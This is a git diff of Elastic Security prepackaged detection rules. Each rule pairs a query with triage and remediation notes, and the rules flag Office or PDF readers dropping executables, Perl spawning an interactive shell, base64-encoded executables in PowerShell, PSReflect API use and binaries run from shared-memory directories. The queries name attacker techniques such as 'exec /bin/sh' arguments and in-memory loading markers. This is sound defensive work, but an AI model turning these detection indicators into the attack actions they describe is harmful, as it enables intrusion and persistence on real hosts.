Office\n\nMicrosoft Office is a suite of applications designed to help with productivity and completing common tasks on a computer.\nYou can create and edit documents containing text and images, work with data in spreadsheets and databases, and create\npresentations and posters. As it is some of the most-used software across companies, MS Office is frequently\ntargeted for initial access. It also has a wide variety of capabilities that attackers can take advantage of.\n\nThis rule searches for executable files written by MS Office applications executed in sequence. This is most likely the result\nof the execution of malicious documents or exploitation for initial access or privilege escalation. This rule can also detect\nsuspicious processes masquerading as the MS Office applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence with maxspan=2h\n [file where event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"WINWORD.EXE\" or\n process.name : \"EXCEL.EXE\" or\n process.name : \"OUTLOOK.EXE\" or\n process.name : \"POWERPNT.EXE\" or\n process.name : \"eqnedt32.exe\" or\n process.name : \"fltldr.exe\" or\n process.name : \"MSPUB.EXE\" or\n process.name : \"MSACCESS.EXE\")\n ] by host.id, file.path\n [process where event.type in (\"start\", \"process_started\")] by host.id, process.executable\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5", "severity": "high", @@ -64,5 +96,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json index a74fb9e92765f..a7507ddfff56f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pdf_written_file.json @@ -15,6 +15,43 @@ "name": "Execution of File Written or Modified by PDF Reader", "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by PDF Reader\n\nPDF is a common file type used in corporate environments and most machines have software to \nhandle these files. This creates a vector where attackers can exploit the engines and technology behind this class of\nsoftware for initial access or privilege escalation.\n\nThis rule searches for executable files written by PDF reader software and executed in sequence. This is most likely the\nresult of exploitation for privilege escalation or initial access. This rule can also detect suspicious processes masquerading as\nPDF readers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve the PDF documents received and opened by the user that could cause this behavior. Common locations include,\nbut are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full scan using the antimalware tool in place. This scan can reveal additional artifacts left in the system,\npersistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. \n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence with maxspan=2h\n [file where event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"AcroRd32.exe\" or\n process.name : \"rdrcef.exe\" or\n process.name : \"FoxitPhantomPDF.exe\" or\n process.name : \"FoxitReader.exe\") and\n not (file.name : \"FoxitPhantomPDF.exe\" or\n file.name : \"FoxitPhantomPDFUpdater.exe\" or\n file.name : \"FoxitReader.exe\" or\n file.name : \"FoxitReaderUpdater.exe\" or\n file.name : \"AcroRd32.exe\" or\n file.name : \"rdrcef.exe\")\n ] by host.id, file.path\n [process where event.type in (\"start\", \"process_started\")] by host.id, process.executable\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "1defdd62-cd8d-426e-a246-81a37751bb2b", "severity": "high", @@ -64,5 +101,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json index 77537be3f1cbb..412ea7fc406ee 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_pentest_eggshell_remote_admin_tool.json @@ -15,6 +15,28 @@ "references": [ "https://github.com/neoneggplant/EggShell" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "41824afb-d68c-4d0e-bfee-474dac1fa56e", "severity": "high", @@ -26,7 +48,31 @@ "Threat Detection", "Execution" ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.006", + "name": "Python", + "reference": "https://attack.mitre.org/techniques/T1059/006/" + } + ] + } + ] + } + ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json index 0f1e857232e40..80db1a45544e3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_perl_tty_shell.json @@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "Interactive Terminal Spawned via Perl", "query": "event.category:process and event.type:(start or process_started) and process.name:perl and\n process.args:(\"exec \\\"/bin/sh\\\";\" or \"exec \\\"/bin/dash\\\";\" or \"exec \\\"/bin/bash\\\";\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "05e5a668-7b51-4a67-93ab-e9af405c9ef3", "severity": "high", @@ -41,5 +63,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json index 4d43c1c64ee60..ab59015c37677 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_portable_executable.json @@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "Suspicious Portable Executable Encoded in Powershell Script", - "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk,\nbypassing file-based security protections. These executables are generally base64 encoded.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n )\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Portable Executable Encoded in Powershell Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell in-memory capabilities to inject executables into memory without touching the disk,\nbypassing file-based security protections. These executables are generally base64 encoded.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n TVqQAAMAAAAEAAAA\n )\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "ad84d445-b1ce-4377-82d9-7c633f28bf9a", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -52,5 +65,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json index 336cb17c67a96..cea7446214218 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_posh_psreflect.json @@ -14,14 +14,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell PSReflect Script", - "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to\ncreate enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and\nmalware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through\nPowerShell, enabling defenders to discover tools being dropped in the environment.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The\nscript content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id`\nfor filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to\ncreate enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and\nmalware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through\nPowerShell, enabling defenders to discover tools being dropped in the environment.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The\nscript content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id`\nfor filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Retrieve the script and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n )\n", "references": [ "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", + "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -61,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json index bd26965a489a6..b1b58d1e8e98c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_from_process_id_file.json @@ -20,6 +20,23 @@ "https://twitter.com/GossiTheDog/status/1522964028284411907", "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3688577a-d196-11ec-90b0-f661ea17fbce", "severity": "high", @@ -50,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json index 18931d56e6e76..297d6d33809a6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_process_started_in_shared_memory_directory.json @@ -13,11 +13,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Binary Executed from Shared Memory Directory", - "query": "process where event.type == \"start\" and \n event.action == \"exec\" and user.name == \"root\" and \n process.executable : (\n \"/dev/shm/*\",\n \"/run/shm/*\",\n \"/var/run/*\",\n \"/var/lock/*\"\n )\n", + "query": "process where event.type == \"start\" and \n event.action == \"exec\" and user.name == \"root\" and \n process.executable : (\n \"/dev/shm/*\",\n \"/run/shm/*\",\n \"/var/run/*\",\n \"/var/lock/*\"\n ) and\n not process.executable : ( \"/var/run/docker/*\")\n", "references": [ "https://linuxsecurity.com/features/fileless-malware-on-linux", "https://twitter.com/GossiTheDog/status/1522964028284411907" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "3f3f9fe2-d095-11ec-95dc-f661ea17fbce", "severity": "high", 